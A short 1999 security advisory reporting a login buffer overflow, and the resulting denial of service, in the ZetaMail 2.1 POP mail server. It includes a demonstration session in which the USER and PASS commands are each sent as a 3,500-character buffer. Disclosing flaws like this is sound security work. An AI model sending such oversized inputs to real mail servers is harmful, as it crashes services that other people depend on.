ZetaMail 2.1 Subject to DoS - 17 Nov 1999

ZetaMail 2.1 Subject to DoS
Reported November 19, 1999 by
USSRLABS
VERSIONS AFFECTED
  • ZetaMail 2.1

DESCRIPTION

UssrLabs discoverd a buffer overflow condition in ZetaMail 2.1 mail server -- the condition is present in the server"s user login sequence.

DEMONSTRATION

POP Overflow:

Connected to example.com.
Escape character is "^\]".
+OK ZetaMail for 95 BD0211 <[email protected]>
USER buffer
+OK Send password
PASS buffer

Where buffer is 3500 characters.

VENDOR RESPONSE

UssrLabs notified Nosque Workshop of this problem. Vendor response is unknown at this time, however, the vendor"s MsgCore products do not appear to have buffer overflow problems - consider using them instead of Zetamail.

CREDITS
Discovered by USSRLABS

Posted here at NTSecurity.net on November 19, 1999
Hide comments

Comments

  • Allowed HTML tags: <em> <strong> <blockquote> <br> <p>

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.
Publish